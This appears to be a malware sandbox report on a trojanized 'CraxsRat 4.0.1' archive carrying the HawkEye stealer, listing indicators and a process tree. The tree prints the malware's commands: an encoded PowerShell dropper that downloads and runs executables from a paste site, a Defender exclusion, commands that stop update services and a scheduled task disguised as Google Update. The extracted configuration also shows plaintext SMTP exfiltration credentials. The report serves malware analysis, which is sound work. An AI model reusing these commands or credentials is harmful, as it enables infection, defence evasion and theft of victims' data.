hawkeye | 330be9927418eca24b6b0acadec70a2ebcdccfd9b3a7588ef4e707bf85c76502

Analysis

max time kernel
205s
max time network
216s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2023 20:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CraxsRat 4.0.1.zip
Size

144.7MB
MD5

8a50e7c45a5e3f997cc5977877905cd4
SHA1

69322ab4e93846603acdf50d778721766ec76515
SHA256

330be9927418eca24b6b0acadec70a2ebcdccfd9b3a7588ef4e707bf85c76502
SHA512

360f6b1aac4648a45b653fb7bd1a91007093ae535e855c043b301240e47cf19f4d78442f080b869a52c62bc3386068afb77b42b8a98349eab780eb39b45d6b14
SSDEEP

3145728:S5mk2EklYF4YYkSO7Wkf9Pb2OE9Mfg9rLrCLVnwXZmYc7qHE:S5mkrMu46SZS9W9MIZL+VwJmLqHE

Score

10^/10

hawkeye collection evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/nipkv/raw

Extracted

Credentials

Protocol: smtp
Host:
smtp.zoho.com
Port:
587
Username:
nexusbuscasg@zohomail.com
Password:
Nescau71#

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

4y4qlhgz.uzx2.exe

description pid process target process

PID 1444 created 3176 1444 4y4qlhgz.uzx2.exe Explorer.EXE

description	pid	process	target process
PID 1444 created 3176	1444	4y4qlhgz.uzx2.exe	Explorer.EXE

NirSoft MailPassView 4 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/1832-1151-0x0000000000400000-0x0000000000484000-memory.dmp	MailPassView
behavioral2/memory/3548-1165-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral2/memory/3548-1167-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral2/memory/3548-1169-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 5 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/1832-1151-0x0000000000400000-0x0000000000484000-memory.dmp	WebBrowserPassView
behavioral2/memory/2016-1176-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral2/memory/2016-1178-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral2/memory/2016-1183-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral2/memory/2016-1187-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView

Nirsoft 8 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1832-1151-0x0000000000400000-0x0000000000484000-memory.dmp	Nirsoft
behavioral2/memory/3548-1165-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral2/memory/3548-1167-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral2/memory/3548-1169-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral2/memory/2016-1176-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral2/memory/2016-1178-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral2/memory/2016-1183-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral2/memory/2016-1187-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

38 4676 powershell.exe
40 4676 powershell.exe
52 548 powershell.exe
53 548 powershell.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
38	4676	powershell.exe
40	4676	powershell.exe
52	548	powershell.exe
53	548	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

BLACKK.exeCraxsRat 4.0.1.exeBLACKK.exeCraxsRat 4.0.1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	BLACKK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	CraxsRat 4.0.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	BLACKK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	CraxsRat 4.0.1.exe

Drops startup file 1 IoCs

Processes:

CraxsRat 4.0.1.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk CraxsRat 4.0.1.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	CraxsRat 4.0.1.exe

Executes dropped EXE 9 IoCs

Processes:

CraxsRat 4.0.1.exeCraxsRat 4.0.1.exeBLACKK.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeBLACKK.exe4y4qlhgz.uzx0.exe4y4qlhgz.uzx1.exe4y4qlhgz.uzx2.exe

pid	process
4448	CraxsRat 4.0.1.exe
4540	CraxsRat 4.0.1.exe
2148	BLACKK.exe
1832	CraxsRat 4.0.1.exe
224	CraxsRat 4.0.1.exe
228	BLACKK.exe
3452	4y4qlhgz.uzx0.exe
2732	4y4qlhgz.uzx1.exe
1444	4y4qlhgz.uzx2.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

vbc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	vbc.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

CraxsRat 4.0.1.exe4y4qlhgz.uzx1.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe"	CraxsRat 4.0.1.exe
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run	4y4qlhgz.uzx1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" "	4y4qlhgz.uzx1.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

43 whatismyipaddress.com
45 whatismyipaddress.com

flow	ioc
43	whatismyipaddress.com
45	whatismyipaddress.com

Suspicious use of SetThreadContext 3 IoCs

Processes:

CraxsRat 4.0.1.exeCraxsRat 4.0.1.exe

description	pid	process	target process
PID 4540 set thread context of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1832 set thread context of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 set thread context of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

5100 sc.exe
5108 sc.exe
3836 sc.exe
5072 sc.exe
4824 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
5100	sc.exe
5108	sc.exe
3836	sc.exe
5072	sc.exe
4824	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeCraxsRat 4.0.1.exe

pid	process
4676	powershell.exe
4676	powershell.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe
1832	CraxsRat 4.0.1.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

7zG.exepowershell.exeCraxsRat 4.0.1.exepowershell.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	3940	7zG.exe
Token: 35	3940	7zG.exe
Token: SeSecurityPrivilege	3940	7zG.exe
Token: SeSecurityPrivilege	3940	7zG.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	1832	CraxsRat 4.0.1.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

7zG.exe

pid process

3940 7zG.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

CraxsRat 4.0.1.exe

pid process

1832 CraxsRat 4.0.1.exe

pid	process
3940	7zG.exe

pid	process
1832	CraxsRat 4.0.1.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

CraxsRat 4.0.1.exeBLACKK.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeCraxsRat 4.0.1.exeBLACKK.exepowershell.exe

description	pid	process	target process
PID 4448 wrote to memory of 4540	4448	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4448 wrote to memory of 4540	4448	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4448 wrote to memory of 4540	4448	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4448 wrote to memory of 2148	4448	CraxsRat 4.0.1.exe	BLACKK.exe
PID 4448 wrote to memory of 2148	4448	CraxsRat 4.0.1.exe	BLACKK.exe
PID 2148 wrote to memory of 4676	2148	BLACKK.exe	powershell.exe
PID 2148 wrote to memory of 4676	2148	BLACKK.exe	powershell.exe
PID 4540 wrote to memory of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4540 wrote to memory of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4540 wrote to memory of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4540 wrote to memory of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4540 wrote to memory of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4540 wrote to memory of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4540 wrote to memory of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4540 wrote to memory of 1832	4540	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 3548	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 1832 wrote to memory of 2016	1832	CraxsRat 4.0.1.exe	vbc.exe
PID 224 wrote to memory of 228	224	CraxsRat 4.0.1.exe	BLACKK.exe
PID 224 wrote to memory of 228	224	CraxsRat 4.0.1.exe	BLACKK.exe
PID 228 wrote to memory of 548	228	BLACKK.exe	powershell.exe
PID 228 wrote to memory of 548	228	BLACKK.exe	powershell.exe
PID 4676 wrote to memory of 3452	4676	powershell.exe	4y4qlhgz.uzx0.exe
PID 4676 wrote to memory of 3452	4676	powershell.exe	4y4qlhgz.uzx0.exe
PID 4676 wrote to memory of 2732	4676	powershell.exe	4y4qlhgz.uzx1.exe
PID 4676 wrote to memory of 2732	4676	powershell.exe	4y4qlhgz.uzx1.exe
PID 4676 wrote to memory of 1444	4676	powershell.exe	4y4qlhgz.uzx2.exe
PID 4676 wrote to memory of 1444	4676	powershell.exe	4y4qlhgz.uzx2.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3176

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.zip"
2⤵
PID:804

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\" -spe -an -ai#7zMap51:108:7zEvent14495
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3940

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4448

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4540

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
5⤵
- Accesses Microsoft Outlook accounts
PID:3548

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
5⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe
"C:\Users\Admin\AppData\Local\Temp\BLACKK.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAZQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQByAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB6AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZAB6AHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAeAByAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAGUAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAdgBsAHcAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB5AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AGYAZwAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676

C:\Users\Admin\AppData\Local\Temp\4y4qlhgz.uzx0.exe
"C:\Users\Admin\AppData\Local\Temp\4y4qlhgz.uzx0.exe"
5⤵
- Executes dropped EXE
PID:3452

C:\Users\Admin\AppData\Local\Temp\4y4qlhgz.uzx1.exe
"C:\Users\Admin\AppData\Local\Temp\4y4qlhgz.uzx1.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2732

C:\Users\Admin\AppData\Local\Temp\4y4qlhgz.uzx2.exe
"C:\Users\Admin\AppData\Local\Temp\4y4qlhgz.uzx2.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:1444

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:224

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe
"C:\Users\Admin\AppData\Local\Temp\BLACKK.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAZQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQByAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB6AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZAB6AHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAeAByAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAGUAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAdgBsAHcAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB5AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AGYAZwAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Users\Admin\AppData\Local\Temp\zmunvtl3.az20.exe
"C:\Users\Admin\AppData\Local\Temp\zmunvtl3.az20.exe"
5⤵
PID:688

C:\Users\Admin\AppData\Local\Temp\zmunvtl3.az21.exe
"C:\Users\Admin\AppData\Local\Temp\zmunvtl3.az21.exe"
5⤵
PID:3556

C:\Users\Admin\AppData\Local\Temp\zmunvtl3.az22.exe
"C:\Users\Admin\AppData\Local\Temp\zmunvtl3.az22.exe"
5⤵
PID:3360

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
PID:3340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:4284

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5100

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5108

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3836

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5072

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4824

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:3248

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4728

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:1840

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:3972

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2352

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:4592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
PID:2692

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"
2⤵
PID:1396

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe
"C:\Users\Admin\AppData\Local\Temp\BLACKK.exe"
3⤵
PID:2772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
